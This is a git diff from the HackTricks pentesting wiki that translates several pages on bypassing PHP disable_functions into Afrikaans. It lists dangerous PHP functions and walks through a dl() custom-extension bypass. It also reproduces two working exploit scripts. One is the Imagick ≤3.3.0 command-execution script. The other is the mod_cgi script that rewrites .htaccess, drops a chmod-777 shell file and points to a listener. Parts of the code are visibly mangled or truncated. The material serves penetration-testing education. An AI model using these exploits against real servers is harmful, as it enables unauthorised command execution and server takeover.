+Dit is belangrik om te onthou dat die gebruik van hierdie funksies om beperkings te omseil, 'n potensiële veiligheidsrisiko kan skep en slegs in spesifieke omstandighede gebruik moet word.
 ```php
 extract    // Opens the door for register_globals attacks (see study in scarlet).
 parse_str  // works like extract if only one argument is given.
@@ -721,13 +841,11 @@ posix_setpgid
 posix_setsid
 posix_setuid
 ```
+### Lêerstelsel Funksies
 
-### Filesystem Functions
-
-According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow\_url\_fopen=On then a url can be used as a file path, so a call to copy($\_GET\['s'], $\_GET\['d']); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server.
-
-**Open filesystem handler**
+Volgens RATS is alle lêerstelsel funksies in PHP sleg. Sommige van hierdie funksies lyk nie baie nuttig vir die aanvaller nie. Ander is nuttiger as wat jy dink. Byvoorbeeld, as allow\_url\_fopen=On is, kan 'n URL as 'n lêerpad gebruik word, so 'n oproep na copy($\_GET\['s'], $\_GET\['d']); kan gebruik word om enige plek op die stelsel 'n PHP-skrips op te laai. As 'n webwerf ook vatbaar is vir 'n versoek wat via GET gestuur word, kan enigeen van hierdie lêerstelsel funksies misbruik word om 'n aanval na 'n ander gasheer deur jou bediener te kanaliseer.
 
+**Open lêerstelselhanterer**
 ```php
 fopen
 tmpfile
@@ -735,9 +853,7 @@ bzopen
 gzopen
 SplFileObject->__construct
 ```
-
-**Write to filesystem (partially in combination with reading)**
-
+**Skryf na lêersisteem (gedeeltelik in kombinasie met lees)**
 ```php
 chgrp
 chmod
@@ -768,9 +884,7 @@ ftp_get
 ftp_nb_get
 scandir
 ```
-
-**Read from filesystem**
-
+**Lees vanaf lêersisteem**
 ```php
 file_exists
 -- file_get_contents
@@ -828,14 +942,14 @@ get_meta_tags
 ```
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md
index e9af878ca..c638feb1d 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md
@@ -1,110 +1,104 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
-**Important note:**
+**Belangrike nota:**
 
 ![image](https://user-images.githubusercontent.com/84577967/174675487-a4c4ca06-194f-4725-85af-231a2f35d56c.png)
 
-**`dl`** is a PHP function that can be used to load PHP extensions. It the function isn't disabled it could be abused to **bypass `disable_functions` and execute arbitrary commands**.\
-However, it has some strict limitations:
+**`dl`** is 'n PHP-funksie wat gebruik kan word om PHP-uitbreidings te laai. As die funksie nie gedeaktiveer is nie, kan dit misbruik word om **`disable_functions` te omseil en arbitrêre opdragte uit te voer**.\
+Dit het egter 'n paar streng beperkings:
 
-* The `dl` function must be **present** in the **environment** and **not disabled**
-* The PHP Extension **must be compiled with the same major version** (PHP API version) that the server is using (you can see this information in the output of phpinfo)
-* The PHP extension must be **located in the directory** that is **defined** by the **`extension_dir`** directive (you can see it in the output of phpinfo). It's very unprobeable that an attacker trying to abuse the server will have write access over this directory, so this requirement probably will prevent you to abuse this technique).
+* Die `dl`-funksie moet **teenwoordig** wees in die **omgewing** en **nie gedeaktiveer** wees nie.
+* Die PHP-uitbreiding moet **gekompileer wees met dieselfde hoofweergawe** (PHP API-weergawe) wat die bediener gebruik (jy kan hierdie inligting sien in die uitset van phpinfo).
+* Die PHP-uitbreiding moet **geleë wees in die gids** wat gedefinieer word deur die **`extension_dir`**-riglyn (jy kan dit sien in die uitset van phpinfo). Dit is baie onwaarskynlik dat 'n aanvaller wat probeer om die bediener te misbruik, skryftoegang tot hierdie gids sal hê, so hierdie vereiste sal waarskynlik voorkom dat jy hierdie tegniek kan misbruik.
 
-**If you meet these requirements, continue reading the post** [**https://antichat.com/threads/70763/**](https://antichat.com/threads/70763/) **to learn how to bypass disable\_functions**. Here is a summary:
+**As jy aan hierdie vereistes voldoen, lees voort na die berig** [**https://antichat.com/threads/70763/**](https://antichat.com/threads/70763/) **om te leer hoe om `disable_functions` te omseil**. Hier is 'n opsomming:
 
-The [dl function](http://www.php.net/manual/en/function.dl.php) is used to load PHP extensions dynamically during script execution. PHP extensions, typically written in C/C++, enhance PHP's functionality. The attacker, upon noticing the `dl` function is not disabled, decides to create a custom PHP extension to execute system commands.
+Die [dl-funksie](http://www.php.net/manual/en/function.dl.php) word gebruik om PHP-uitbreidings dinamies tydens skripsuitvoering te laai. PHP-uitbreidings, tipies geskryf in C/C++, verbeter PHP se funksionaliteit. Die aanvaller besluit om 'n aangepaste PHP-uitbreiding te skep om stelselopdragte uit te voer nadat hy besef het dat die `dl`-funksie nie gedeaktiveer is nie.
 
-### Steps Taken by the Attacker:
+### Stappe geneem deur die aanvaller:
 
-1. **PHP Version Identification:**
-   - The attacker determines the PHP version using a script (``).
+1. **PHP-weergawe-identifikasie:**
+- Die aanvaller bepaal die PHP-weergawe deur 'n skripsie (``) te gebruik.
 
-2. **PHP Source Acquisition:**
-   - Downloads the PHP source from the official [PHP website](http://www.php.net/downloads.php) or the [archive](http://museum.php.net) if the version is older.
+2. **PHP-bronverkryging:**
+- Laai die PHP-bron af van die amptelike [PHP-webwerf](http://www.php.net/downloads.php) of die [argief](http://museum.php.net) as die weergawe ouer is.
 
-3. **Local PHP Setup:**
-   - Extracts and installs the specific PHP version on their system.
+3. **Plaaslike PHP-opstelling:**
+- Pak die spesifieke PHP-weergawe uit en installeer dit op hul stelsel.
 
-4. **Extension Creation:**
-   - Studies [creating PHP extensions](http://www.php.net/manual/en/zend.creating.php) and inspects the PHP source code.
-   - Focuses on duplicating the functionality of the [exec function](http://www.php.net/manual/en/function.exec.php) located at `ext/standard/exec.c`.
+4. **Uitbreidingsskepping:**
+- Bestudeer [die skepping van PHP-uitbreidings](http://www.php.net/manual/en/zend.creating.php) en ondersoek die PHP-bronkode.
+- Fokus op die duplisering van die funksionaliteit van die [exec-funksie](http://www.php.net/manual/en/function.exec.php) wat geleë is by `ext/standard/exec.c`.
 
-### Notes for Compiling the Custom Extension:
+### Notas vir die Kompilering van die Aangepaste Uitbreiding:
 
 1. **ZEND_MODULE_API_NO:**
-   - The `ZEND_MODULE_API_NO` in `bypass.c` must match the current Zend Extension Build, retrievable with:
-     ```bash
-     php -i | grep "Zend Extension Build" |awk -F"API4" '{print $2}' | awk -F"," '{print $1}'
-     ```
+- Die `ZEND_MODULE_API_NO` in `bypass.c` moet ooreenstem met die huidige Zend Extension Build, wat verkry kan word met:
+```bash
+php -i | grep "Zend Extension Build" |awk -F"API4" '{print $2}' | awk -F"," '{print $1}'
+```
 
-2. **PHP_FUNCTION Modification:**
-   - For recent PHP versions (5, 7, 8), `PHP_FUNCTION(bypass_exec)` may need adjustment. The provided code snippet details this modification.
+2. **PHP_FUNCTION-wysiging:**
+- Vir onlangse PHP-weergawes (5, 7, 8) mag `PHP_FUNCTION(bypass_exec)` aanpassing benodig. Die voorsiene kodefragment beskryf hierdie wysiging in detail.
 
-### Custom Extension Files:
+### Lêers vir die Aangepaste Uitbreiding:
 
 - **bypass.c**:
-  - Implements the core functionality of the custom extension.
+- Implementeer die kernfunksionaliteit van die aangepaste uitbreiding.
 - **php_bypass.h**:
-  - Header file, defining extension properties.
+- Koptekslêer, definieer uitbreidingskenmerke.
 - **config.m4**:
-  - Used by `phpize` to configure the build environment for the custom extension.
+- Word deur `phpize` gebruik om die bou-omgewing vir die aangepaste uitbreiding te konfigureer.
 
-### Building the Extension:
+### Die Uitbreiding Bou:
 
-1. **Compilation Commands:**
-   - Uses `phpize`, `./configure`, and `make` to compile the extension.
-   - Resulting `bypass.so` is then located in the modules subdirectory.
+1. **Kompilasie-opdragte:**
+- Gebruik `phpize`, `./configure`, en `make` om die uitbreiding te kompileer.
+- Die resulterende `bypass.so` word dan in die subgids modules geplaas.
 
-2. **Cleanup:**
-   - Runs `make clean` and `phpize --clean` after compilation.
+2. **Skoonmaak:**
+- Voer `make clean` en `phpize --clean` uit na kompilasie.
 
-### Uploading and Executing on the Victim Host:
+### Oplaai en Uitvoer op die Slagofferbediener:
 
-1. **Version Compatibility:**
-   - Ensures PHP API versions match between the attacker's and victim's systems.
+1. **Weergawekompatibiliteit:**
+- Verseker dat die PHP API-weergawes ooreenstem tussen die aanvaller se en slagoffer se stelsels.
 
-2. **Extension Loading:**
-   - Utilizes the `dl` function, circumventing restrictions by using relative paths or a script to automate the process.
+2. **Uitbreiding Laai:**
+- Maak gebruik van die `dl`-funksie en omseil beperkings deur relatiewe paaie of 'n skripsie te gebruik om die proses outomaties te maak.
 
-3. **Script Execution:**
-   - The attacker uploads `bypass.so` and a PHP script to the victim's server.
-   - The script uses `dl_local` function to dynamically load `bypass.so` and then calls `bypass_exec` with a command passed via the `cmd` query parameter.
+3. **Skripsie-uitvoering:**
+- Die aanvaller laai `bypass.so` en 'n PHP-skripsie na die slagoffer se bediener.
+- Die skripsie gebruik die `dl_local`-funksie om `bypass.so` dinamies te laai en roep dan `bypass_exec` aan met 'n opdrag wat deur die `cmd`-navraagparameter oorgedra word.
 
-### Command Execution:
+### Opdraguitvoering:
 
-- The attacker can now execute commands by accessing: `http://www.example.com/script.php?cmd=`
+- Die aanvaller kan nou opdragte uitvoer deur toegang te verkry tot: `http://www.example.com/script.php?cmd=`
 
 
-This detailed walkthrough outlines the process of creating and deploying a PHP extension to execute system commands, exploiting the `dl` function, which should ideally be disabled to prevent such security breaches.
+Hierdie gedetailleerde deurlooptog verduidelik die proses om 'n PHP-uitbreiding te skep en te implementeer om stelselopdragte uit te voer deur die `dl`-funksie te misbruik, wat idealiter gedeaktiveer moet word om sulke sekuriteitskendings te voorkom.
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
+Ander maniere om HackTricks te ondersteun:
 
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md
index d2baf5b2e..385fa32a5 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md
@@ -1,24 +1,21 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
 # Imagick <= 3.3.0 PHP >= 5.4 Exploit
 
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
-
+Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
 ```php
 # Exploit Title: PHP Imagick disable_functions Bypass
 # Date: 2016-05-04
@@ -47,42 +44,37 @@ From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog
 echo "Disable functions: " . ini_get("disable_functions") . "\n";
 $command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
 echo "Run command: $command\n====================\n";
- 
+
 $data_file = tempnam('/tmp', 'img');
 $imagick_file = tempnam('/tmp', 'img');
- 
+
 $exploit = <<$data_file")'
 pop graphic-context
 EOF;
- 
+
 file_put_contents("$imagick_file", $exploit);
 $thumb = new Imagick();
 $thumb->readImage("$imagick_file");
 $thumb->writeImage(tempnam('/tmp', 'img'));
 $thumb->clear();
 $thumb->destroy();
- 
+
 echo file_get_contents($data_file);
 ?>
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md
index c5cbfdba1..bc085cb7b 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md
@@ -1,24 +1,21 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
 # mod\_cgi
 
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
-
+Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
 ```php
 \n";
+echo "$text: " . ($condition ? $yes : $no) . "
\n";
 }
 if (!isset($_GET['checked']))
 {
-	@file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed
-	header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked
+@file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed
+header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked
 }
 else
 {
-	$modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?
-	$writable = is_writable('.'); //current dir writable?
-	$htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?
-		checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No");
-		checkEnabled("Is writable",$writable,"Yes","No");
-		checkEnabled("htaccess working",$htaccess,"Yes","No");
-	if(!($modcgi && $writable && $htaccess))
-	{
-		echo "Error. All of the above must be true for the script to work!"; //abort if not
-	}
-	else
-	{
-		checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded! Saved in .htaccess.bak","Failed!"); //make a backup, cause you never know.
-		checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGI\nAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); //.dizzle is a nice extension
-		checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); //write the file
-		checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); //rwx
-		echo "Executing the script now. Check your listener "; //call the script
-	}
+$modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?
+$writable = is_writable('.'); //current dir writable?
+$htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?
+checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No");
+checkEnabled("Is writable",$writable,"Yes","No");
+checkEnabled("htaccess working",$htaccess,"Yes","No");
+if(!($modcgi && $writable && $htaccess))
+{
+echo "Error. All of the above must be true for the script to work!"; //abort if not
+}
+else
+{
+checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded! Saved in .htaccess.bak","Failed!"); //make a backup, cause you never know.
+checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGI\nAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); //.dizzle is a nice extension
+checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); //write the file
+checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); //rwx
+echo "Executing the script now. Check your listener "; //call the script
+}
 }
 ?>
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md
index 8495863f0..2d3b7c6ba 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md
@@ -1,62 +1,54 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
